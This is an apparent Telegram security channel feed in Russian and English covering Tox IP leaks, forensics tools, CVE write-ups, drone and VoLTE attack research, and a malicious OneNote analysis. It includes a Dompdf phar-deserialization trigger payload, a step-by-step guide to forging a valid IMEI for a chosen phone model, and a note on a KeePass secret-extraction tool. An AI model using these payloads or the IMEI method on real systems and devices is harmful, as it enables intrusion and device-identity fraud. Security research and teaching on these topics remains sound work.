🔓Вот и все, любители Токса(конкретно uTOX и qTOX)....На самом деле не все так плохо, однако давайте посмотрим.В клиентах uTox и qTox (как на винде, так и на линуксе ) текут IP-адреса выхода(Egress IPs более понятно, но на всякий случай озвучу: это IP-адреса, трафик которых по большому счету выходит за пределы объекта или границы сети, то бишь те, которые участвуют в передаче трафика из хост-сети во внешнюю сеть) и по большому счету в P2P такое встречается не редко. То есть общаетесь вы с помощью uTOX/qTOX и по сути обе стороны видят IPшники. Очевидные контрмеры: как минимум использовать VPN/прокси(причем лучше использовать SOCKS5-прокси и отключать IPv6), а лучше весь трафик uTox/qTox или любого другого Tox-клиента оборачивать через TOR.🔓That's all, lovers of Tox (specifically uTox and qTox)....In fact, not everything is so bad, but let's see.In uTox and qTox clients (both on Windows and Linux) leaks Egress IP addresses (IP addresses whose traffic by and large goes beyond the object or network boundaries, that is, those that participate in the transmission of traffic from the host network to the external network) and by and large in P2P, this is not uncommon. That is, you communicate using uTox/qTox and in fact both sides see IPsObvious countermeasures: at a minimum, use a VPN/proxy (and it is better to use SOCKS5 proxy and disable IPv6), and it is better to route all the traffic of uTox/qTox or any other Tox client via TOR.🤙Thx @UK_Daniel_Card, @olihoughio & @3xp0rtblog#security #anonymity #deanonymization #P2P #Tox
2023-02-26 01:33:20
#anonymity #deanonymization #P2P #Tox
2023-02-24 11:11:42
Там где можно использовать одноразовые ящики, я использую одноразовые. Там где нельзя - использую Tutanota. Это что касается использования почты для регистрации и подобных движений.Для всех прочих "почтовых" движений я уже давно использую Disroot. Что это за проект я рассказывал тут https://t.me/tvoijazz/1283.Никаких страшилок про этот проект я не встречал и сам с какими-то проблемами в конфиденциальности не сталкивался.Регистрируете ящик, прямо на сайте проекта создаете на него alias, чтобы нигде не светить реальный, и полученный условный vasja@getgoogleoff.me используете в свое удовольствие.Там же на сайте, если не хотите использовать приложение Disroot, которое по сути простой интерфейс доступа к сервису через WebView, есть подробная инструкция как интегрировать ваш ящик в, наверное, самый известный опенсорсный почтовый клиент К-9 https://f-droid.org/packages/com.fsck.k9/Данный почтовый клиент имеет прямую интеграцию с другим известным опенсорсным инструментом Openkeychain. Про него и про кооперацию с жабой я немного рассказывал здесь https://t.me/tvoijazz/391.В итоге вы имеете приличный почтовый ящик, хороший почтовый клиент с понятным и простым интерфейсом и собственное шифрование, которое позволяет положить с прибором на риски прочтения вашей почты третьими лицами.
2023-02-24 10:32:52
|AppSec Ezine|📰471rd EditionRelease Date: 24/02/2023pathonprojectgithub#ezine #appsec #infosec
2023-02-23 09:10:07
📕Best Practices for Securing Your Home Network#NSA #CSI #security #privacy #wirelessNetwork #router #Authentication #browsers #storage #assistance
2023-02-23 09:10:01
None Images
2023-02-22 15:38:04
Форензика и борьба с ней💥Пока я пишу большую статью про мобильную форензику, решила выложить список инструментов, сборников и материалов по обычной(в основном ПК) форензике и борьбе ней.Надеюсь вам будет полезно 🔑Русская версияForensics and wrestling with it💥While I'm writing a big article about mobile forenzika, I decided to post a list of tools, compilations and materials on regular(mostly PC) forensics and wrestling with it.I hope you will find it useful 🔑English version#forensics #anonymity #anti_forensics #malware #cryptography
2023-02-22 15:22:18
|UAC aka Unix-like Artifacts Collector|🕵️‍♂️Данный скрипт(свой набор инструментов и бинарей) будет полезен IR-специалистам для сбора артефактов из Unix-подобных систем: AIX, Android, ESXi, FreeBSD, Linux, macOS, NetBSD, NetScaler, OpenBSD и Solaris. По сути для UAC нужен только шелл и запустить можно не только на вышеперечисленных системах, но а в целом на Unix-подобный. Для примера: захотели достать артефакты из маршрутизатора на OpenWrt и вуаля, у нас есть UAC который справится с данной задачей и вытащит данные без необходимости в установке оного.А на что непосредственно скрипт способен? Ниже привожу основные функции:💾Не нужно устанавливать и можно запустить условно везде без зависимостей💾Кастомизируемые и расширяемые коллекции/артефакты💾Волатильность соблюдается во время сбора артефактов💾Хэширование запущенных процессов и исполняемых процессов💾Сбор информации из процессов запущенных без бинарника на диске💾Сбор артефактов из приложений💾Сбор пользовательских и системных конфигурационных файлов и логов💾Получение волатильной памяти из Linux-систем посредством различных методов и инструментов💾Извлечение информации из файлов и директорий для создания bodyfile(в том числе и расширенные атрибуты файла для ext4).🔖Документация тут.🕵️‍♂️This script (its own set of tools and binaries) will be useful for IR specialists to collect artifacts from Unix-like systems: AIX, Android, ESXi, FreeBSD, Linux, macOS, NetBSD, NetScaler, OpenBSD and Solaris. In fact, UAC only needs a shell and can be run not only on the above systems, but also on Unix-like in general. For example: we wanted to get artifacts from the router on OpenWRT and voila, we have a UAC that will cope with this task and pull out the data without the need to install it.And what is the script capable of directly? Below are the main functions:💾No need to install and can be run conditionally everywhere without dependencies💾Customized and expandable collections/artifacts💾Volatility is observed during artifact collection💾Hashing of running processes and executable processes💾Collecting information from processes running without a binary on disk💾Collecting artifacts from applications💾Collection of user and system configuration files and logs💾Obtaining volatile memory from Linux systems through various methods and tools💾Extract information from files and directories to create a bodyfile (including extended file attributes for ext4).🔖Documentation here.#DFIR #forensics #triage #memory #artifacts #processes #Unix #Android #ESXi #FreeBSD #Linux #macOS #NetBSD #NetScaler #OpenBSD #Solaris
2023-02-22 15:22:12
#DFIR #forensics #triage #memory #artifacts #processes #Unix #Android #ESXi #FreeBSD #Linux #macOS #NetBSD #NetScaler #OpenBSD #Solaris
2023-02-22 13:22:24
💥1day link Private Shizo(fully free)
2023-02-22 01:41:57
#iOS #iPadOS #SysLogs #processes #jailBrokenDevices
2023-02-22 01:41:27
|Antoine|📲Данное приложение(Antoine) можно считать эквивалентом Console.app(macOS), только работающим на iOS/iPadOS. По сути у нас появляется UI для просмотра ОС/системных логов на iOS/iPadOS в реальном времени и возможность фильтровать полученные данные.Функции приложения:💾Stream-журналы💾Фильтрация полученных данных разными способами: по сообщению, процессу, категории, подсистеме и pid.💾Можно просматривать дату и время создания журнала, его тип и т.д.💾Есть поддержка стриминга приложений в фоновом режиме(для этого необходима постоянная авторизация местонахождения) .⚠️Важно!Данное приложение поддерживается устройствами на iOS 13+, при условии что установлен TrollStore или устройство на котором можно получить произвольные права или был получен(установлен) джейлбрейк .📲This application (Antoine) can be considered the equivalent of Console.app(macOS), but it works on iOS/iPadOS. In fact, we have a UI for viewing OS/system logs in real time and the ability to filter the received data.Application functions:💾Stream Logs💾Filtering the received data in different ways: by message, process, category, subsystem and pid.💾You can view the date and time of the log creation, its type, etc.💾There is support for streaming applications in the background (this requires always-on authorization of the location).⚠️ Important!This application is supported by devices running iOS 13+, provided that a TrollStore is installed or a device on which arbitrary rights can be obtained or a jailbroken device.#iOS #iPadOS #SysLogs #processes #jailBrokenDevices
2023-02-22 01:40:19
#iOS #iPadOS #SysLogs #processes #jailBrokenDevices
2023-02-21 12:01:00
🔥🔥🔥REUnziP: Re-Exploiting Huawei Recovery With FaultyUSB(CVE-2022-44563, Toc-ToU race condition vuln can be exploited to achieve arbitrary code execution )This is a new vulnerability in a proprietary mode called “SD-Update”, which can once again be used to achieve arbitrary code execution in the recovery mode, enabling unauthentic firmware updates, firmware downgrades to a known vulnerable version or other system modifications. Taszk advisory for the vulnerability is published here. The story of exploiting this vulnerability was made interesting by the fact that, since the exploit abuses wrong assumptions about the behavior of an external SD card, we needed some hardware-fu to actually be able to trigger it. In this blog post, Lorant Szabo describe how we went about creating “FaultyUSB” - a custom Raspberry Pi based setup that emulates a maliciously behaving USB flash drive - and exploiting this vulnerability to achieve arbitrary code execution as root!
2023-02-21 11:41:49
📕The Ultimate Guide to Getting Started in DFIR(v2.0)#DFIR #forensics #SANS #manual
2023-02-21 11:41:37
#DFIR #forensics #SANS #manual
2023-02-17 18:29:30
Как быть?Я бы сначала задал более фундаментальный вопрос - "быть или не быть?". Если вы озабочены такой проблемой как грамотная генерация и подмена IMEI, вы должны совершенно определенно знать те два с половиной случая когда это реально необходимо. Во всех остальных случаях - это пустая трата времени.Ну ок, давайте про IMEI. А конкретно про префиксы. Первые восемь цифр любого IMEI-кода - это так называемый TAC (не путайте с одноименным кодом в телефонии, это разные идентификаторы, хоть и с одинаковой аббревиатурой). В данном случае TAC - Type Allocation Code, присваивается конкретной модели устройства конкретного производителя. Соответственно, эти цифры должны совпадать с реальным устройством, под которое вы мимикрируете (мастырите фейк, епта). Остальные цифры в IMEI тоже несут смысловую нагрузку, но практическое значение в этом случае имеют только первые восемь и последняя (проверка контрольной суммы). И только отталкиваясь от этого можно генерировать IMEI. Например, ваше целевое устройство (ну, фейк же, епта) - Google Pixel 7 (кодовое имя panther). Для начала, вам необходимо узнать префикс TAC данной модели. Заходите, как вариант, на данный ресурс https://swappa.com/imei/tac, и среди всратых бесконечных моделей всяких самсунгов находите целевое устройство. Префикс TAC для Pixel 7 - это (но не только это) 35368324Берете эти цифры и тащите их в генератор, который не просто генерирует валидный идентификатор с корректной контрольной суммой, но и позволяет делать это на основе заданного префикса (конкретной модели конкретного производителя), например сюда https://olegon.ru/imei/После этого чекаете полученный идентификатор, и, если результат такой как на скрине ниже, можете использовать его в своих отвратительных махинациях.Про генерацию IMSI и MAC расскажу как-нибудь в другой раз. Или не расскажу.
2023-02-17 16:25:47
📲Hope of Delivery: Extracting User Locations From Mobile Instant Messengers#privacy #security #expoitation #timingSCA #messaging #mobile #Signal #Threema #Whatspp #Geolocation
2023-02-17 16:25:40
#privacy #security #expoitation #timingSCA #messaging #mobile #Signal #Threema #Whatspp #Geolocation
2023-02-17 16:14:48
📡Drone Security and the Mysterious Case of DJI’s DroneID#UAVs #drones #security #privacy #RE #fuzzing #vulnerability #expoitation #fw #DJI #DroneID #SDR #OFDM #QPSK
2023-02-17 16:13:59
📡Drone Security and the Mysterious Case of DJI’s DroneIDСвежая работа про поверхность атаки DJI-дронов, разбор обсуждаемого неоднократно (НЕ)безопасного дизайна протокола DJI DroneID(отключение, перехвати и подделывание оного, из последних - "DJI drone IDs are not encrypted") с использованием дешевого оборудования и программного обеспечения,реверса fw и hw, фаззинг и реверс протокола связи DJI и найденная пачка багов, которые могут привести к выполнению произвольного кода(arbitrary code execution) или к изменению серийного номера девайсе или атакующий отправляет OTA(over-the-air)-пэйлоад, который может вывести из строя дрон еще во время полета или разблокировка рутового adb-шелла .Причем в работе разбирается как сценарий с пассивной атакой без физического доступа к птичке(перехват OTA-трафика, спектральный анализ, демодуляция и декодирование сигналов) , так и с активной атакой(когда птичка на руках: байпасс сигнатурной верификации fw, засовывание бэкдора в fw трансивера и доставка SDRH-файлов через fastboot ). 🔖Сорцы фаззера и DroneID ресивера появятся скоро в данной репе. Fresh work about the attack surface of DJI drones, analysis of the repeatedly discussed (NOT) secure design of the DJI DroneID protocol (disabling, intercepting and faking it, from the latest - "DJI drone IDs are not encrypted") using cheap hardware and software,reverse fw and hw, fuzzing and reverse engineering of the DJI communication protocol and a bundle of bugs found that can lead to arbitrary code execution or to a change in the serial number of the device or the attacker sends an OTA(over-the-air)-payload, which can disable the drone even during the flight or unlocking the root adb shell. Moreover, the work deals with both a scenario with a passive attack without physical access to the bird (interception of OTA traffic, spectral analysis, demodulation and decoding of signals) and an active attack (when the bird is on hand: bypass fw signature verification, inserting a backdoor into the fw of the transceiver and uploading SDRH files via fastboot).🔖Fuzzer and DroneID receiver source code will appear soon in this repo.#UAVs #drones #security #privacy #RE #fuzzing #vulnerability #expoitation #fw #DJI #DroneID #SDR #OFDM #QPSK
2023-02-17 16:12:39
#UAVs #drones #security #privacy #RE #fuzzing #vulnerability #expoitation #fw #DJI #DroneID #SDR #OFDM #QPSK
2023-02-17 09:53:36
|AppSec Ezine|📰470rd EditionRelease Date: 17/02/2023pathonprojectgithub#ezine #appsec #infosec
2023-02-16 13:44:34
Шпаргалка для использования дорков. — Здесь собраны работающие и актуальные дорки. — В конце шпаргалки представлены ресурсы и статьи для дальнейшего изучения ремесла поиска. — Сохрани иначе потеряешь ;)
2023-02-14 13:14:34
📕Remote Side-Channel Attacks(SCA) and Defenses#security #sideChannel #TimingAttack #electromagnetic #software #hardware #cryptography #expoitation
2023-02-14 01:48:16
|RecoverPy|🕵️‍♂️Опубликую довольно простой в использовании инструмент, написанный на питоне и применяемый для восстановления удаленных/перезаписанных данных, сканируя каждый блок выбранного раздела(делая по уму, лучше изначально размонтировать раздел, все-таки меньше изменений - лучше для нас) . Не советую сильно надеяться на восстановление перезаписанных данных и настоятельно рекомендую предварительно ознакомиться с следующими статьями:💾Пятнадцать мифов о восстановлении и потере данных💾Мифы о восстановлении данных💾Заметаем следы. Как уничтожить данные быстро и безвозвратно💾Как надёжно удалить файлы и зачистить HDD/SSD💾Как стереть данные так, чтобы их не смогли восстановить спецслужбы?Использовать просто:1️⃣Запускаем из под рута/sudo(su do) в случае с системны разделом):# python3 -m recoverpy$ sudo python3 -m recoverpy2️⃣Выбираем раздел, в котором находятся интересующий(ие) нас файл(ы).3️⃣Вводим текстовую строку для поиска, результат поиска будет в левом поле.4️⃣Выбираем результат и нажимаем на "Open"5️⃣После вышеописанных шагов у нас есть несколько вариантов развития событий: сохранить этот блок отдельно или просмотреть соседние блоки в поисках оставшихся частей файла. После чего, результаты можно сохранить в одном файле и наслаждаться или нет, полученным продуктом работы инструмента.🕵️‍♂️I will publish a fairly easy-to-use tool written in python and used to restore deleted/overwritten data by scanning each block of the selected partition (doing it wisely, it is better to initially unmount the partition, after all, fewer changes are better for us) . I do not advise you to hope too much for the recovery of overwritten data!It's easy to use:1️⃣Run from under the root /sudo(su do) in the case of the system partition:):# python3 -m recoverpy$ sudo python3 -m recoverpy2️⃣Select the partition in which the file(s) of interest to us are located.3️⃣Enter a text string for the search, the search result will be in the left field.4️⃣Select the result and click on "Open"5️⃣After the above steps, we have several options for the development of events: save this block separately or browse adjacent blocks in search of the remaining parts of the file. After that, the results can be saved in a single file and enjoy or not, the resulting product of the tool.#forensics #DataRecovery
2023-02-14 01:48:09
#forensics #DataRecovery
2023-02-10 21:56:37
📕Ransomware Attacks on CriticalInfrastructure Fund DPRK(Democratic People’s Republic of Korea) Malicious Cyber Activities#advisory #NSA #FBI #CISA #HHS #ROK #NIS #DSA #CSA #DPRK #security #ransomware #ICS #exploitation #Apache #Log4j #SMA100 #TOS
2023-02-10 11:17:13
|AppSec Ezine|📰469rd EditionRelease Date: 10/02/2023pathonprojectgithub#ezine #appsec #infosec
2023-02-05 23:59:42
🔥🔥🔥Linux Kernel: Bypassing Spectre-BTI User Space Mitigations(CVE-2023-0045)The Linux kernel does not correctly mitigate SMT attacks, as discovered through a strange pattern in the kernel API using STIBP as a mitigation, leaving the process exposed for a short period of time after a syscall. The kernel also does not issue an IBPB immediately during the syscall.The ib_prctl_set function updates the Thread Information Flags (TIFs) for the task and updates the SPEC_CTRL MSR on the function __speculation_ctrl_update, but the IBPB is only issued on the next schedule, when the TIF bits are checked. This leaves the victim vulnerable to values already injected on the BTB, prior to the prctl syscall.The behavior is only corrected after a reschedule of the task happens. Furthermore, the kernel entrance (due to the syscall itself), does not issue an IBPB in the default scenarios (i.e., when the kernel protects itself via retpoline or eIBRS).🛡Security patch(Flush IBP in ib_prctl_set())💥 PoC + writeup
2023-02-05 23:54:18
📕Light Commands: Laser-Based Audio Injection Attacks on Voice-Controllable Systems🔖 Website(including demo)📺 Recording a speech on YouTube#audio #light #laser #microphone #expoitation #signalInjection
2023-02-05 23:53:41
#audio #light #laser #microphone #expoitation #signalInjection
2023-02-05 23:36:18
📕Watching your call: Breaking VoLTE Privacy in LTE/5G Networks#security #privacy #mobileCommunication #5G #LTE #VoLTE #NR #cryptography
2023-02-05 23:35:25
|Конфиденциальность VoLTE под угрозой| 📲Все больше вижу на просторах сети исследовательских работ касательно конфиденциальности в сетях LTE и 5G, атаки и детектирование атак соответственно на радиоэлектронном уровне. В то же время VoLTE(Voice over LTE) затрагивается в меньшей мере. Если говорить вкратце, VoLTE основана на IMS со специальными профилями для управления и мультимедийных плоскостей голосовой службы, собственно VoLTE интегрирована в LTE("большая четверка" в лице Мегафона, МТС, Теле2 и Билайн, уже как несколько лет предоставляют поддержку данной платформы на территории РФ). Так что, благодаря VoLTE можно передавать звук в виде мультимедиа по LTE, как поток данных c управлением полосы пропускания для конкретного вида трафика(отсюда её охарактеризовывают как услугу пакетной телефонии) , причем происходит шифрование этих самых голосовых данных с помощью потокового шифрования(телефон ↔️ сеть). Также есть VoNR(Voice over New Radio), похожая на VoLTE только для сетей 5G, в котором есть SUCI для того, чтобы мешать злоумышленнику воспользоваться IMSI-catchers(детектор IMSI-Catchers) . Про плюсы и минусы можно спокойно найти в сети(качество звучания, скорость соединения, зона покрытия и так далее), также прикладываю ниже ссылки, чтобы можно было предварительно разобраться с VoLTE подробнее:⛓How does VoLTE work? What is the difference between VoLTE and VoWiFi?⛓Difference between LTE and VoLTE⛓Learning VoWifi, VoLTE, and IMS: because I'm too Millennial to make a phone call⛓VoLTE/VoWiFi research with $0 of equipment: set up a phone network over Wi-Fi callingТеперь к вопросу конфиденциальности VoLTE. Вышла недавно работа: "Watching your call: Breaking VoLTE Privacy in LTE/5G Networks", которая разбирает наглядно как можно получить доступ к зашифрованным метаданным вызовов(журналы активности VoLTE, которые содержат в себе: время вызовов. , продолжительность и входящий или исходящий вызов в случае для разговоров по мобильной сети) и конечно не забыли про рекомендации по защите/смягчения от данных атак. Чем это чревато? Исследователи показали как можно использовать вышеописаные метаданные для сопоставления(отображение) телефонных номеров (связывание телефонных номеров с анонимизированными идентификаторами сетей LTE и 5G-SA - GUTI). То есть благодаря предложенным улучшениями атаки от исследователей, злоумышленник после восстановления журналов активности VoLTE /NR жертв, которые он получил из собранного зашифрованного трафика, а далее связываются с ранее упомянутыми анонимизированные идентификаторы с реальными. Причем атакующий может добиться очень высоких показателей НЕобнаружения(undetectability) и надежности.Собственно в работе были представлены два типа атак на конфиденциальность VoLTE/NR:💾Атака мониторинга активности. Используя зашифрованные данные PDCP можно восстановить действия VoLTE/NR.💾Атака восстановления идентификационных данных. Благодаря данному типу атак появляется возможность получать сетевые идентификаторы и привязывать их к телефонным номерам жертв, используя трафик VoLTE/NR. Ниже описано как может протекать атака:1️⃣Мониторинг пользовательского оборудования2️⃣Сбор удостоверений личности3️⃣Анализ журналов VoLTE для дальнейшего извлечения из них данных о действиях VoLTE жертвы.4️⃣Отображение идентичности📲Также, рекомендую сперва ознакомится с еще одной атакой на VoLTE(более старая), которая называется ReVoLTE и направлена на раскрытие зашифрованных VoLTE вызовов. Данная атака возможна по причине использования одного и того же ключа(ключевого потока) дважды и более раза в реализации поточного шифра(обнаружили Raza и Lu). #security #privacy #mobileCommunication #5G #LTE #VoLTE #NR #cryptography
2023-02-05 23:33:04
#security #privacy #mobileCommunication #5G #LTE #VoLTE #NR #cryptography
2023-02-05 22:57:56
|Anti-Forensics|🕵️‍♂️У меня нередко спрашивали про анти-форензику, посему опубликую тут полезный по моему мнению репозиторий от Ali Hadi про актуальные анти-форензик техники, которые были составлены с помощью сообщества в данном твите. 🕵️‍♂️I have often been asked about anti-forensis, therefore I will publish here a useful repository from Ali Hadi about current anti-forensis techniques that were compiled with the help of the community in this tweet.#antiForensics #DFIR #Steganography #cryptography #OS #virtuallization #FS #Logs
2023-02-04 14:55:44
📡Space Jam: Exploring Radio Frequency Attacks in Outer Space
2023-02-04 14:55:31
#RF #satellite #Exploitation #Hijacking #GPS #jamming
2023-02-03 16:27:14
Я сделала сборник различных инструментов и материалов по радио хакингу, так же там есть материалы/инструменты по мобильной связи.В этом сборнике я дала подробное их оп описаниеНадеюсь вам будет интересно ❤️Русская версия#radio_hacking #radio_waves #tools #gsm #mobile #network #ss7 #cve
2023-02-03 15:46:44
📕Detect Me If You Can - Anti-Firmware Forensics📺 Download the recording of the speech.
2023-02-03 15:46:05
#security #forensics #fw #bootkit #MitM #SMMrootkit
2023-02-03 15:26:22
|Joint Doctrine Note 1/23|🕵️‍♂️Довольно познавательная записка о совместной доктрине 1/23, выпущенная МО Великобритании, раскрывающая детали перехода от традиционной(линейной) разведки к операционно-разведывательной деятельности и ISR( Intelligence, Surveillance и Reconnaissance), ориентированную на проблемы.🕵️‍♂️A rather informative note on Joint Doctrine 1/23, issued by the UK MOD, revealing the details of the transition from traditional (linear) intelligence to operational intelligence and ISR (Intelligence, Surveillance and Reconnaissance), focused on problems.#MoD #ISR #Intelligence #Surveillance #Reconnaissance #expoitation #automation #AI #ML
2023-02-03 15:26:05
#MoD #ISR #Intelligence #Surveillance #Reconnaissance #expoitation #automation #AI #ML
2023-02-03 14:06:32
|AppSec Ezine|🎂Сегодня вот уже как 9 лет выпускается еженедельно электронный журнал(e-zine) "AppSec Ezine", благодарность автору за регулярность и актуальность публикуемых в нем материалов.🎂Today, the weekly electronic magazine (e-zine) "AppSec Ezine" has been published for 9 years, thanks to the author for the regularity and relevance of the materials published in it.📰468rd EditionRelease Date: 03/02/2023pathonprojectgithub#ezine #appsec #infosec
2023-02-01 20:06:05
|Короткий анализ ошибки в Dompdf(CVE-2023-23924)|🤙 Шизо на связи! Продолжаем знакомиться с багами.Что из себя представляет Dompdf?По сути dompdf - это распространенная PHP-библиотека, позволяющая осуществлять рендеринг PDF-файлов из HTML.УязвимостьВ версии 2.0.1 dompdf была обнаружена уязвимость в проверке URI, позволяющая забайпассить оную, передав <image> тэги с заглавными буквами, что может привести несериализации произвольного объекта в версии PHP: < 8.0.0 посредством phar URL-враппера(статья про эксплуатацию уязвимостей десериализации в PHAR, выступление на blackhat USA 2018 "File Operation Induced Unserialization via the “phar://” Stream Wrapper" ).Влияние уязвимости В случае успешной эксплуатации уязвимости, атакующий может добиться RCE(вне зависимости от доступных классов) и как минимум достичь произвольного удаления файла, в том случае если используемая версия PHP: < 8.0.0. Другой исход удачной эксплуатации: атакующий может добиться вызова произвольного URL-адреса.Добиться можно благодаря использованию SVG-изображения в dompdf с условием, про которое уже написал в разделе "Уязвимость". Анализ причинКак уже писал выше, ошибка возникает во время парсинга <image> тэгов(в скриншоте указал, уязвимый код находится в файле src/Image/Cache.php). Выходит это так: сперва идет проверка "является ли тип файла SVG": if ($type === "svg"), далее в ходе парсинга идет проверка "имя тега image?": if ($name === "image"), которое необходимо для обнаружения тега <image> в SVG, однако в версии 2.0.1 данное сравнение в условии чувствительно к регистру. Поэтому следующих код, содержащий тег <Image> вместо <image>, не пройдет условие для того, чтобы затригерить проверку, также мы воспользуемся phar для несериализации произвольного объекта:<svg> <Image xlink:href="phar:///foo"></Image></svg>ИсправлениеВ данном исправлении, которое вышло для версии 2.0.2, произошло добавление функции strtolower(функция обработки текста, возвращающая строку с ASCII-буквами, преобразованными в нижний регистр), которая принимает аргумент в виде переменной-строки $name в условии: if (strtolower($name) === "image")Тригерим багу(PoC)Как уже писалось в разделе "Анализ причин", затриггерить ошибку довольно просто(код приводится ниже повторно):<svg> <Image xlink:href="phar:///foo"></Image></svg>
2023-01-31 15:31:24
🕵️‍♂️Помните был почти полгода назад NSA Codebreaker 2022, где была серия задач, связанная с рансом-инцидентом , который приближен к реальному инциденту?Так вот, появилась серия описаний решений задач оттуда(writeup в простонародье), ниже прикладываю.🕵️‍♂️Remember there was an NSA Codebreaker 2022 almost six months ago, where there was a series of tasks related to a ransom incident that is close to a real incident?So, there was a series of descriptions of solutions to problems from there (writeup in the common people), I attach below.📝 Official Write-up📝 2022 NSA Codebreaker Challenge Writeup(5t0n3)📝 NSA Codebreaker Challenge 2022 Writeup(Byte Breach)📝 NSA Codebreaker 2022 Writeups(aNdYrYeW)📝 NSA Codebreaker Challenge 2022(0xfbad)📝 Writeups from the 2022 NSA Codebreakers CTF Challenge(0-C0FF3E)📝 NSA Codebreaker 2022 Writeups(DanielC949)📝 NSA Codebreaker Challenge 2022 Writeups(rohanvis24)📝 NSA CodeBreaker Challenge 2022(diohabara)#NSA #FBI #Codebreaker2022 #ransomware
2023-01-29 18:16:54
🔓KeePwn is a python script to help red teamers discover KeePass instances and extract secrets.💾KeePwn's search mode can be used to identify hosts that run KeePass on your target environment. 💾KeePwn's trigger mode can be used to search, add and remove malicious triggers. It can also recover cleartext exports from the targeted host.
2023-01-28 09:59:14
🕵️‍♂️Mobile Forensic Analysis of Signal Messenger Application on Android using DigitalForensic Research Workshop (DFRWS) Framework#forensics #mobile #android #messaging #signal #DFRWS
2023-01-28 09:59:06
#forensics #mobile #android #messaging #signal #DFRWS
2023-01-27 15:32:33
|AppSec Ezine|📰467rd EditionRelease Date: 27/01/2023pathonprojectgithub#ezine #appsec #infosec
2023-01-26 11:55:03
📕The Analyst Mindset: A Cognitive Skills Assessment of Digital Forensic Analysts🕵️‍♂️Не одними чисто техническими аспектами силен форензик-специалист(как и в целом специалист из любой другой области, однако тут акцент на специалистах, занимающихся цифровой форензикой).Данное исследование дает нам представление о мышлении форензик-специалиста, демонстрируя ментальные модели, в том числе: процедурные навыки и навыки принятия решений формирующих модель диагностического запроса.🕵️‍♂️The forensic specialist is not only strong in purely technical aspects (as well as in general a specialist from any other field, but here the emphasis is on specialists engaged in digital forensics).This study gives us an idea of the thinking of a forensic specialist, demonstrating mental models, including: procedural skills and decision-making skills forming a model of a diagnostic query.#forensics #imvestigation #mindset #mental
2023-01-26 11:54:45
#forensics #imvestigation #mindset #mental
2023-01-26 09:24:23
Я наконец то дописала большую статью про безопасность линукс на русском. Материал для моих англоязычных читателей выйдет чуть позжеI finally wrote a long article about Linux security.Material for my English-speaking readers will be released a little laterПриятного прочтения❤️#vpn #linux #tor #i2p #mac #decentralization #cryptography #cve #dos #еtthernet #anonymity #attackers
2023-01-25 22:49:05
📕RedTeam With OneNote Sections. Windows Initial Vector Series#malware #OneNote #InitialAccess #VBS #VBA #MacroPackPro
2023-01-25 22:47:56
|Malicious OneNote Docs|🕵️‍♂️Today on SANS I saw the post "A First Malicious OneNote Document" by Xavier Mertens with an analysis of the malicious MS OneNote file (read about OneNote file format here), The peculiarity of the file is that it has an HTA(.hta) file embedded in it, which in turn loads a harmless note to distract attention and uploads with further the execution of an obfuscated batnik, which in turn is a dropper pulling up a payload encrypted with AES. And the deception is quite simple: PNG image with the text "Click to view document", which was actually needed to hide suspicious elements. In fact, there was nothing new in the analysis, except that the script onedump.py , developed by Didier (his article about the analysis of malicious OneNote documents can be found here) and aimed at analyzing and extracting data from OneNote files. In Xavier's article, a VB script was mentioned, but it was not said that OneNote does not allow VBA macros to be executed, or that in addition to HTA, you can embed files like LNK or EXE, and also allows you to use fake extensions. Or another important point: malicious Excel/Word/PPT that can be embedded in a document are reproduced without protected viewing, and an attacker can automate some tasks using OneNote.Application and XML.It can also be noted that attackers for OneNote automation can delete the wrong registry key:Computer\HKEY_CLASSES_ROOT\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.0📕For a better picture, I recommend reading the document from @EmericNasi about using OneNote to gain initial access to the system (many attacks are given using the software he is developing - MacroPack Pro). 🦠Also, get acquainted with how in the sandbox ANY.RUN worked out a sample that delivered Asyncrat to the victim's system.🧰Among other things, there is also a tool (OneNoteAnalyzer) written in C# for analyzing malicious OneNote documents, which extracts the following data:💾Attachments from an OneNote document along with the actual attachment path, file name and size💾Page metadata from OneNote document: title, author, creation time and last modification time💾Images from the OneNote document together with hyperlink URLs, if any (why is it important - we read about the deception at the beginning)💾Paginated text from OneNote document💾Hyperlinks from the OneNote document together with the superimposed text 💾And of course, you can use it to convert OneNote documents into an image⚠️So, to be honest, the loud title of the article "A First Malicious OneNote Document" misleads the reader and the attacks have long been successful, that is, MacroPack Pro users began actively using this initial access vector back in August 2022.#DFIR #malware #OneNote #InitialAccess #VBS #bat #obfuscation #MacroPackPro
2023-01-25 22:47:31
|Вредоносные OneNote документы|🕵️‍♂️Сегодня на SANS увидел пост "A First Malicious OneNote Document" от Ксавье Мертенс с анализом вредоносного файла MS OneNote(почитать про OneNote формат файла можно тут), Особенность файла состоит в том, что в него встроен файл HTA(.hta), который в свою очередь подгружает безобидную заметку для отвлечения внимания и подгрузка с дальнейшим исполнением обфусцированного батника, который в свою очередь является дроппером, подтягивающим пэйлоад, зашифрованный AES. А обманка довольно простая: PNG-изображение с текстом "Click to view document", которое собственно нужно было для сокрытия подозрительных элементов. По сути в анализе ничего нового не было, разве что скрипт onedump.py, разработанный Дидье(с его статьей про анализ вредоносных OneNote документов можно ознакомиться тут) и направленный на анализ и извлечение данных из файлов OneNote. В статье Ксавье был упомянут VB-скрипт, однако не было сказано, что OneNote не позволяет выполнять VBA-макросы или что помимо HTA, можно встроить файлы по типу LNK или EXE, причем еще и позволяет использовать поддельные расширения. Или еще важный момент: вредоносные Excel/Word/PPT, которые можно встроить в документ воспроизводятся без защищенного просмотра, а некоторые задачи атакующий может автоматизировать, используя OneNote.Application и XML. Можно также отметить, что злоумышленники для работы автоматизации OneNote, могут удалять неверный раздел реестра:Computer\HKEY_CLASSES_ROOT\TypeLib\{0EA692EE-BB50-4E3C-AEF0-356D91732725}\1.0📕Для лучшей картины рекомендую ознакомиться с документом от @EmericNasi про использование OneNote для получения первоначального доступа к системе(много атак приводится с использованием, разрабатываемого им ПО - MacroPack Pro). 🦠Также, ознакомится как в песочнице ANY.RUN отработал сэмпл, который доставлял Asyncrat на систему жертвы.🧰Помимо всего прочего, есть еще инструмент(OneNoteAnalyzer) написанный на C# для анализа вредоносных OneNote документов, который извлекает следующие данные:💾Вложения из документа OneNote вместе с фактическим путем вложения, именем файла и размером💾Метаданные страницы из документа OneNote: название, автор, время создания и время последней модификации💾Изображения из документа OneNote вместе с URL-адресами гиперссылок, если таковые имеются(почему это важно - читаем в начале про обманку)💾Постраничный текст из документа OneNote💾Гиперссылки из документа OneNote вместе с наложенным текстом 💾И конечно же с помощью него можно сконвертировать OneNote документы в изображение⚠️Так что, если говорить честно, то громкий заголовок статьи "A First Malicious OneNote Document" вводит в заблуждение читателя и атаки уже давно имеют успешный характер, то есть пользователи MacroPack Pro 